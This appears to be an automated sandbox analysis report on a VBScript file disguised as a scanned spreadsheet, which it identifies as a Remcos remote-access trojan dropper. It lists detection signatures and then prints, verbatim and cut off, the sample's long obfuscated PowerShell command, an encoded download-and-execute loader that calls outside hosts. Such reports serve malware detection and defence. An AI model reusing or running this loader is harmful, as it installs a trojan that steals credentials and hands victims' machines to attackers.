Windows Analysis Report
SKMBT_77122012816310TD0128_17311_XLS.vbs

Overview

General Information

Sample name:SKMBT_77122012816310TD0128_17311_XLS.vbs
Analysis ID:1524804
MD5:9b36a3c24abb6bc8694e48e0c101c416
SHA1:6fd1c1c65d63f349734f2efcce64c88b3efd5e45
SHA256:7d9aaab519a7c1247963967a928107516c36dae564a31c230dcc2ba6c9cb6b15
Tags:vbsuser-abuse_ch
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Copy file to startup via Powershell
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Connects to many ports of the same IP (likely port scanning)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Creates autostart registry keys with suspicious values (likely registry only malware)
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Self deletion via cmd or bat file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect virtual machines (STR)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Script Run in AppData
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses FTP
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 1492 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 1600 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'EQ' + [char]65 + 'R' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'EQ' + [char]65 + 'Jw' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + 'BY' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'VQB1' + [char]65 + 'Gg' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Gg' + [char]65 + 'd' + [char]65 + 'B0' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'cw' + [char]65 + '6' + [char]65 + 'C8' + [char]65 + 'LwB3' + [char]65 + 'Hc' + [char]65 + 'dw' + [char]65 + 'u' + [char]65 + 'Gc' + [char]65 + 'cgBh' + [char]65 + 'HQ' + [char]65 + 'aQB0' + [char]65 + 'HU' + [char]65 + 'Z' + [char]65 + 'Bl' + [char]65 + 'HM' + [char]65 + 'ZQBl' + [char]65 + 'Gs' + [char]65 + 'ZQBy' + [char]65 + 'HM' + [char]65 + 'LgBj' + [char]65 + 'G8' + [char]65 + 'bQ' + [char]65 + 'v' + [char]65 + 'Hc' + [char]65 + 'c' + [char]65 + '' + [char]65 + 't' + [char]65 + 'Gk' + [char]65 + 'bgBj' + [char]65 + 'Gw' + [char]65 + 'dQBk' + [char]65 + 'GU' + [char]65 + 'cw' + [char]65 + 'v' + [char]65 + 'GM' + [char]65 + 'dQBz' + [char]65 + 'HQ' + [char]65 + 'bwBt' + [char]65 + 'Gk' + [char]65 + 'egBl' + [char]65 + 'C8' + [char]65 + 'YwBz' + [char]65 + 'HM' + [char]65 + 'LwBi' + [char]65 + 'GQ' + [char]65 + 'LgB0' + [char]65 + 'Hg' + [char]65 + 'd' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'F0' + [char]65 + 'XQBb' + [char]65 + 'HQ' + [char]65 + 'YwBl' + [char]65 + 'Go' + [char]65 + 'YgBv' + [char]65 + 'Fs' + [char]65 + 'I' + [char]65 + '' + [char]65 + 's' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'b' + [char]65 + 'Bs' + [char]65 + 'HU' + [char]65 + 'bg' + [char]65 + 'k' + 
[char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bl' + [char]65 + 'Gs' + [char]65 + 'bwB2' + [char]65 + 'G4' + [char]65 + 'SQ' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Ek' + [char]65 + 'VgBG' + [char]65 + 'HI' + [char]65 + 'c' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bk' + [char]65 + 'G8' + [char]65 + 'a' + [char]65 + 'B0' + [char]65 + 'GU' + [char]65 + 'TQB0' + [char]65 + 'GU' + [char]65 + 'Rw' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'Jw' + [char]65 + 'x' + [char]65 + 'HM' + [char]65 + 'cwBh' + [char]65 + 'Gw' + [char]65 + 'Qw' + [char]65 + 'u' + [char]65 + 'DM' + [char]65 + 'eQBy' + [char]65 + 'GE' + [char]65 + 'cgBi' + [char]65 + 'Gk' + [char]65 + 'T' + [char]65 + 'Bz' + [char]65 + 'HM' + [char]65 + 'YQBs' + [char]65 + 'EM' + [char]65 + 'Jw' + [char]65 + 'o' + [char]65 + 'GU' + [char]65 + 'c' + [char]65 + 'B5' + [char]65 + 'FQ' + [char]65 + 'd' + [char]65 + 'Bl' + [char]65 + 'Ec' + [char]65 + 'Lg' + [char]65 + 'p' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'WgBj' + [char]65 + 'EI' + [char]65 + 'YwBh' + [char]65 + 'CQ' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'o' + [char]65 + 'GQ' + [char]65 + 'YQBv' + [char]65 + 'Ew' + [char]65 + 'LgBu' + [char]65 + 'Gk' + [char]65 + 'YQBt' + [char]65 + 'G8' + [char]65 + 'R' + [char]65 + 'B0' + [char]65 + 'G4' + [char]65 + 'ZQBy' + [char]65 + 'HI' + [char]65 + 'dQBD' + [char]65 + 'Do' + [char]65 + 'OgBd' + [char]65 + 'G4' + [char]65 + 'aQBh' + [char]65 + 'G0' + [char]65 + 'bwBE' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'c' + [char]65 + 'BB' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'Ww' + [char]65 + '7' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'p' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'JwBB' + [char]65 + 'Cc' + [char]65 + 'I' + [char]65 + '' + [char]65 + 's' + [char]65 + 'C' + [char]65 + 
'' + [char]65 + 'JwCTITo' + [char]65 + 'kyEn' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bl' + [char]65 + 'GM' + [char]65 + 'YQBs' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'ZQBS' + [char]65 + 'C4' + [char]65 + 'ZwBT' + [char]65 + 'Ho' + [char]65 + 'QwBC' + [char]65 + 'Gw' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'Cg' + [char]65 + 'ZwBu' + [char]65 + 'Gk' + [char]65 + 'cgB0' + [char]65 + 'FM' + [char]65 + 'N' + [char]65 + '' + [char]65 + '2' + [char]65 + 'GU' + [char]65 + 'cwBh' + [char]65 + 'EI' + [char]65 + 'bQBv' + [char]65 + 'HI' + [char]65 + 'Rg' + [char]65 + '6' + [char]65 + 'Do' + [char]65 + 'XQB0' + [char]65 + 'HI' + [char]65 + 'ZQB2' + [char]65 + 'G4' + [char]65 + 'bwBD' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'Ww' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'Ba' + [char]65 + 'GM' + [char]65 + 'QgBj' + [char]65 + 'GE' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'F0' + [char]65 + 'XQBb' + [char]65 + 'GU' + [char]65 + 'd' + [char]65 + 'B5' + [char]65 + 'EI' + [char]65 + 'Ww' + [char]65 + '7' + [char]65 + 'Cc' + [char]65 + 'JQBJ' + [char]65 + 'Gg' + [char]65 + 'cQBS' + [char]65 + 'Fg' + [char]65 + 'JQ' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Fg' + [char]65 + 'U' + [char]65 + 'BV' + [char]65 + 'HU' + [char]65 + 'a' + [char]65 + '' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Gc' + [char]65 + 'UwB6' + [char]65 + 'EM' + [char]65 + 'QgBs' + [char]65 + 'CQ' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'o' + [char]65 + 'Gc' + [char]65 + 'bgBp' + [char]65 + 'HI' + [char]65 + 'd' + [char]65 + 'BT' + [char]65 + 'GQ' + [char]65 + 'YQBv' + [char]65 + 'Gw' + [char]65 + 'bgB3' + [char]65 + 'G8' + [char]65 + 'R' + [char]65 + '' + [char]65 + 'u' + [char]65 + 'GY' + [char]65 + 'cQBk' + [char]65 + 'Go' + [char]65 + 'bQ' + 
[char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Gc' + [char]65 + 'UwB6' + [char]65 + 'EM' + [char]65 + 'QgBs' + [char]65 + 'CQ' + [char]65 + 'Ow' + [char]65 + '4' + [char]65 + 'EY' + [char]65 + 'V' + [char]65 + 'BV' + [char]65 + 'Do' + [char]65 + 'OgBd' + [char]65 + 'Gc' + [char]65 + 'bgBp' + [char]65 + 'GQ' + [char]65 + 'bwBj' + [char]65 + 'G4' + [char]65 + 'RQ' + [char]65 + 'u' + [char]65 + 'HQ' + [char]65 + 'e' + [char]65 + 'Bl' + [char]65 + 'FQ' + [char]65 + 'LgBt' + [char]65 + 'GU' + [char]65 + 'd' + [char]65 + 'Bz' + [char]65 + 'Hk' + [char]65 + 'UwBb' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Gc' + [char]65 + 'bgBp' + [char]65 + 'GQ' + [char]65 + 'bwBj' + [char]65 + 'G4' + [char]65 + 'RQ' + [char]65 + 'u' + [char]65 + 'GY' + [char]65 + 'cQBk' + [char]65 + 'Go' + [char]65 + 'bQ' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'KQB0' + [char]65 + 'G4' + [char]65 + 'ZQBp' + [char]65 + 'Gw' + [char]65 + 'QwBi' + [char]65 + 'GU' + [char]65 + 'Vw' + [char]65 + 'u' + [char]65 + 'HQ' + [char]65 + 'ZQBO' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'd' + [char]65 + 'Bj' + [char]65 + 'GU' + [char]65 + 'agBi' + [char]65 + 'E8' + [char]65 + 'LQB3' + [char]65 + 'GU' + [char]65 + 'Tg' + [char]65 + 'o' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'GY' + [char]65 + 'cQBk' + [char]65 + 'Go' + [char]65 + 'bQ' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'o' + [char]65 + 'GU' + [char]65 + 'cwBv' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'cwBp' + [char]65 + 'GQ' + [char]65 + 'LgBm' + [char]65 + 'HE' + [char]65 + 'Z' + [char]65 + 'Bq' + [char]65 + 'G0' + [char]65 + 'J' + [char]65 + '' + [char]65 + '7' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'HQ' + [char]65 + 'e' + [char]65 + 'B0' + [char]65 + 'C4' + [char]65 + 'MQ' + [char]65 + 'w' + [char]65 + 'Ew' + [char]65 + 'T' + [char]65 + 'BE' + 
[char]65 + 'C8' + [char]65 + 'MQ' + [char]65 + 'w' + [char]65 + 'C8' + [char]65 + 'cgBl' + [char]65 + 'HQ' + [char]65 + 'c' + [char]65 + 'B5' + [char]65 + 'HI' + [char]65 + 'YwBw' + [char]65 + 'FU' + [char]65 + 'LwBy' + [char]65 + 'GI' + [char]65 + 'LgBt' + [char]65 + 'G8' + [char]65 + 'Yw' + [char]65 + 'u' + [char]65 + 'HQ' + [char]65 + 'YQBy' + [char]65 + 'GI' + [char]65 + 'dgBr' + [char]65 + 'GM' + [char]65 + 'cwBl' + [char]65 + 'GQ' + [char]65 + 'LgBw' + [char]65 + 'HQ' + [char]65 + 'ZgB' + [char]65 + '' + [char]65 + 'DE' + [char]65 + 'd' + [char]65 + 'Bh' + [char]65 + 'HI' + [char]65 + 'YgB2' + [char]65 + 'Gs' + [char]65 + 'YwBz' + [char]65 + 'GU' + [char]65 + 'Z' + [char]65 + '' + [char]65 + 'v' + [char]65 + 'C8' + [char]65 + 'OgBw' + [char]65 + 'HQ' + [char]65 + 'Zg' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bn' + [char]65 + 'G4' + [char]65 + 'aQBy' + [char]65 + 'HQ' + [char]65 + 'UwBk' + [char]65 + 'GE' + [char]65 + 'bwBs' + [char]65 + 'G4' + [char]65 + 'dwBv' + [char]65 + 'EQ' + [char]65 + 'LgBm' + [char]65 + 'HE' + [char]65 + 'Z' + [char]65 + 'Bq' + [char]65 + 'G0' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'Bn' + [char]65 + 'FM' + [char]65 + 'egBD' + [char]65 + 'EI' + [char]65 + 'b' + [char]65 + '' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'n' + [char]65 + 'E' + [char]65 + '' + [char]65 + 'Q' + [char]65 + 'Bw' + [char]65 + 'Eo' + [char]65 + 'O' + [char]65 + '' + [char]65 + '3' + [char]65 + 'DU' + [char]65 + 'MQ' + [char]65 + 'y' + [char]65 + 'G8' + [char]65 + 'cgBw' + [char]65 + 'HI' + [char]65 + 'ZQBw' + [char]65 + 'G8' + [char]65 + 'b' + [char]65 + 'Bl' + [char]65 + 'HY' + [char]65 + 'ZQBk' + [char]65 + 'Cc' + [char]65 + 'L' + [char]65 + '' + [char]65 + 'p' + [char]65 + 'Ck' + [char]65 + 'OQ' + [char]65 + '0' + [char]65 + 'Cw' + [char]65 + 'Ng' + [char]65 + 'x' + [char]65 + 'DE' + [char]65 + 'L' + [char]65 + '' + [char]65 + '3' + 
[char]65 + 'Dk' + [char]65 + 'L' + [char]65 + '' + [char]65 + '0' + [char]65 + 'DE' + [char]65 + 'MQ' + [char]65 + 's' + [char]65 + 'Dg' + [char]65 + 'OQ' + [char]65 + 's' + [char]65 + 'Dg' + [char]65 + 'MQ' + [char]65 + 'x' + [char]65 + 'Cw' + [char]65 + 'Nw' + [char]65 + 'w' + [char]65 + 'DE' + [char]65 + 'L' + [char]65 + '' + [char]65 + '5' + [char]65 + 'Dk' + [char]65 + 'L' + [char]65 + '' + [char]65 + '1' + [char]65 + 'DE' + [char]65 + 'MQ' + [char]65 + 's' + [char]65 + 'DE' + [char]65 + 'M' + [char]65 + '' + [char]65 + 'x' + [char]65 + 'Cw' + [char]65 + 'M' + [char]65 + '' + [char]65 + 'w' + [char]65 + 'DE' + [char]65 + 'K' + [char]65 + 'Bd' + [char]65 + 'F0' + [char]65 + 'WwBy' + [char]65 + 'GE' + [char]65 + 'a' + [char]65 + 'Bj' + [char]65 + 'Fs' + [char]65 + 'I' + [char]65 + 'Bu' + [char]65 + 'Gk' + [char]65 + 'bwBq' + [char]65 + 'C0' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'o' + [char]65 + 'Gw' + [char]65 + 'YQBp' + [char]65 + 'HQ' + [char]65 + 'bgBl' + [char]65 + 'GQ' + [char]65 + 'ZQBy' + [char]65 + 'EM' + [char]65 + 'awBy' + [char]65 + 'G8' + [char]65 + 'dwB0' + [char]65 + 'GU' + [char]65 + 'Tg' + [char]65 + 'u' + [char]65 + 'HQ' + [char]65 + 'ZQBO' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'I' + [char]65 + 'B0' + [char]65 + 'GM' + [char]65 + 'ZQBq' + [char]65 + 'GI' + [char]65 + 'bw' + [char]65 + 't' + [char]65 + 'Hc' + [char]65 + 'ZQBu' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'HM' + [char]65 + 'b' + [char]65 + 'Bh' + [char]65 + 'Gk' + [char]65 + 'd' + [char]65 + 'Bu' + [char]65 + 'GU' + [char]65 + 'Z' + [char]65 + 'Bl' + [char]65 + 'HI' + [char]65 + 'Qw' + [char]65 + 'u' + [char]65 + 'GY' + [char]65 + 'cQBk' + [char]65 + 'Go' + [char]65 + 'bQ' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'O' + [char]65 + 'BG' + [char]65 + 'FQ' + [char]65 + 'VQ' + [char]65 + '6' + [char]65 + 'Do' + [char]65 + 'XQBn' + [char]65 + 'G4' + [char]65 + 'aQBk' + 
[char]65 + 'G8' + [char]65 + 'YwBu' + [char]65 + 'EU' + [char]65 + 'LgB0' + [char]65 + 'Hg' + [char]65 + 'ZQBU' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'Ww' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'Bn' + [char]65 + 'G4' + [char]65 + 'aQBk' + [char]65 + 'G8' + [char]65 + 'YwBu' + [char]65 + 'EU' + [char]65 + 'LgBm' + [char]65 + 'HE' + [char]65 + 'Z' + [char]65 + 'Bq' + [char]65 + 'G0' + [char]65 + 'J' + [char]65 + '' + [char]65 + '7' + [char]65 + 'Ck' + [char]65 + 'd' + [char]65 + 'Bu' + [char]65 + 'GU' + [char]65 + 'aQBs' + [char]65 + 'EM' + [char]65 + 'YgBl' + [char]65 + 'Fc' + [char]65 + 'LgB0' + [char]65 + 'GU' + [char]65 + 'Tg' + [char]65 + 'g' + [char]65 + 'HQ' + [char]65 + 'YwBl' + [char]65 + 'Go' + [char]65 + 'YgBP' + [char]65 + 'C0' + [char]65 + 'dwBl' + [char]65 + 'E4' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'Bm' + [char]65 + 'HE' + [char]65 + 'Z' + [char]65 + 'Bq' + [char]65 + 'G0' + [char]65 + 'J' + [char]65 + '' + [char]65 + '7' + [char]65 + 'Gc' + [char]65 + 'UwB6' + [char]65 + 'EM' + [char]65 + 'QgBs' + [char]65 + 'CQ' + [char]65 + 'Ow' + [char]65 + 'y' + [char]65 + 'DE' + [char]65 + 'cwBs' + [char]65 + 'FQ' + [char]65 + 'Og' + [char]65 + '6' + [char]65 + 'F0' + [char]65 + 'ZQBw' + [char]65 + 'Hk' + [char]65 + 'V' + [char]65 + 'Bs' + [char]65 + 'G8' + [char]65 + 'YwBv' + [char]65 + 'HQ' + [char]65 + 'bwBy' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'eQB0' + [char]65 + 'Gk' + [char]65 + 'cgB1' + [char]65 + 'GM' + [char]65 + 'ZQBT' + [char]65 + 'C4' + [char]65 + 'd' + [char]65 + 'Bl' + [char]65 + 'E4' + [char]65 + 'LgBt' + [char]65 + 'GU' + [char]65 + 'd' + [char]65 + 'Bz' + [char]65 + 'Hk' + [char]65 + 'UwBb' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Gw' + [char]65 + 'bwBj' + [char]65 + 'G8' + [char]65 + 'd' + [char]65 + 'Bv' + [char]65 + 'HI' + [char]65 + 'U' + 
[char]65 + 'B5' + [char]65 + 'HQ' + [char]65 + 'aQBy' + [char]65 + 'HU' + [char]65 + 'YwBl' + [char]65 + 'FM' + [char]65 + 'Og' + [char]65 + '6' + [char]65 + 'F0' + [char]65 + 'cgBl' + [char]65 + 'Gc' + [char]65 + 'YQBu' + [char]65 + 'GE' + [char]65 + 'TQB0' + [char]65 + 'G4' + [char]65 + 'aQBv' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'ZQBj' + [char]65 + 'Gk' + [char]65 + 'dgBy' + [char]65 + 'GU' + [char]65 + 'Uw' + [char]65 + 'u' + [char]65 + 'HQ' + [char]65 + 'ZQBO' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'Ww' + [char]65 + '7' + [char]65 + 'H0' + [char]65 + 'ZQB1' + [char]65 + 'HI' + [char]65 + 'd' + [char]65 + '' + [char]65 + 'k' + [char]65 + 'Hs' + [char]65 + 'I' + [char]65 + '' + [char]65 + '9' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'awBj' + [char]65 + 'GE' + [char]65 + 'YgBs' + [char]65 + 'Gw' + [char]65 + 'YQBD' + [char]65 + 'G4' + [char]65 + 'bwBp' + [char]65 + 'HQ' + [char]65 + 'YQBk' + [char]65 + 'Gk' + [char]65 + 'b' + [char]65 + 'Bh' + [char]65 + 'FY' + [char]65 + 'ZQB0' + [char]65 + 'GE' + [char]65 + 'YwBp' + [char]65 + 'GY' + [char]65 + 'aQB0' + [char]65 + 'HI' + [char]65 + 'ZQBD' + [char]65 + 'HI' + [char]65 + 'ZQB2' + [char]65 + 'HI' + [char]65 + 'ZQBT' + [char]65 + 'Do' + [char]65 + 'OgBd' + [char]65 + 'HI' + [char]65 + 'ZQBn' + [char]65 + 'GE' + [char]65 + 'bgBh' + [char]65 + 'E0' + [char]65 + 'd' + [char]65 + 'Bu' + [char]65 + 'Gk' + [char]65 + 'bwBQ' + [char]65 + 'GU' + [char]65 + 'YwBp' + [char]65 + 'HY' + [char]65 + 'cgBl' + [char]65 + 'FM' + [char]65 + 'LgB0' + [char]65 + 'GU' + [char]65 + 'Tg' + [char]65 + 'u' + [char]65 + 'G0' + [char]65 + 'ZQB0' + [char]65 + 'HM' + [char]65 + 'eQBT' + [char]65 + 'Fs' + [char]65 + 'ew' + [char]65 + 'g' + [char]65 + 'GU' + [char]65 + 'cwBs' + [char]65 + 'GU' + [char]65 + 'fQ' + [char]65 + 'g' + [char]65 + 'GY' + [char]65 + 'Lw' + [char]65 + 'g' + [char]65 + 'D' + [char]65 + '' + [char]65 + 'I' + [char]65 + 'B0' + [char]65 + 'C8' 
+ [char]65 + 'I' + [char]65 + 'By' + [char]65 + 'C8' + [char]65 + 'I' + [char]65 + 'Bl' + [char]65 + 'Hg' + [char]65 + 'ZQ' + [char]65 + 'u' + [char]65 + 'G4' + [char]65 + 'dwBv' + [char]65 + 'GQ' + [char]65 + 'd' + [char]65 + 'B1' + [char]65 + 'Gg' + [char]65 + 'cw' + [char]65 + 'g' + [char]65 + 'Ds' + [char]65 + 'Jw' + [char]65 + 'w' + [char]65 + 'Dg' + [char]65 + 'MQ' + [char]65 + 'g' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'ZQBl' + [char]65 + 'Gw' + [char]65 + 'cw' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Z' + [char]65 + 'Bu' + [char]65 + 'GE' + [char]65 + 'bQBt' + [char]65 + 'G8' + [char]65 + 'Yw' + [char]65 + 't' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'ZQB4' + [char]65 + 'GU' + [char]65 + 'LgBs' + [char]65 + 'Gw' + [char]65 + 'ZQBo' + [char]65 + 'HM' + [char]65 + 'cgBl' + [char]65 + 'Hc' + [char]65 + 'bwBw' + [char]65 + 'Ds' + [char]65 + 'I' + [char]65 + 'Bl' + [char]65 + 'GM' + [char]65 + 'cgBv' + [char]65 + 'GY' + [char]65 + 'LQ' + [char]65 + 'g' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'dQB0' + [char]65 + 'HI' + [char]65 + 'YQB0' + [char]65 + 'FM' + [char]65 + 'X' + [char]65 + 'Bz' + [char]65 + 'G0' + [char]65 + 'YQBy' + [char]65 + 'Gc' + [char]65 + 'bwBy' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'X' + [char]65 + 'B1' + [char]65 + 'G4' + [char]65 + 'ZQBN' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'd' + [char]65 + 'By' + [char]65 + 'GE' + [char]65 + 'd' + [char]65 + 'BT' + [char]65 + 'Fw' + [char]65 + 'cwB3' + [char]65 + 'G8' + [char]65 + 'Z' + [char]65 + 'Bu' + [char]65 + 'Gk' + [char]65 + 'VwBc' + [char]65 + 'HQ' + [char]65 + 'ZgBv' + [char]65 + 'HM' + [char]65 + 'bwBy' + [char]65 + 'GM' + [char]65 + 'aQBN' + [char]65 + 'Fw' + [char]65 + 'ZwBu' + [char]65 + 'Gk' + [char]65 + 'bQBh' + [char]65 + 'G8' + [char]65 + 'UgBc' + [char]65 + 'GE' + [char]65 + 'd' + [char]65 + 'Bh' + [char]65 + 'EQ' + [char]65 + 'c' + [char]65 + 'Bw' + [char]65 + 
'EE' + [char]65 + 'X' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Kw' + [char]65 + 'g' + [char]65 + 'Fo' + [char]65 + 'SwBu' + [char]65 + 'Fk' + [char]65 + 'TQ' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'G4' + [char]65 + 'bwBp' + [char]65 + 'HQ' + [char]65 + 'YQBu' + [char]65 + 'Gk' + [char]65 + 'd' + [char]65 + 'Bz' + [char]65 + 'GU' + [char]65 + 'R' + [char]65 + '' + [char]65 + 't' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Jw' + [char]65 + 'l' + [char]65 + 'Ek' + [char]65 + 'a' + [char]65 + 'Bx' + [char]65 + 'FI' + [char]65 + 'W' + [char]65 + '' + [char]65 + 'l' + [char]65 + 'Cc' + [char]65 + 'I' + [char]65 + 'Bt' + [char]65 + 'GU' + [char]65 + 'd' + [char]65 + 'BJ' + [char]65 + 'C0' + [char]65 + 'eQBw' + [char]65 + 'G8' + [char]65 + 'Qw' + [char]65 + 'g' + [char]65 + 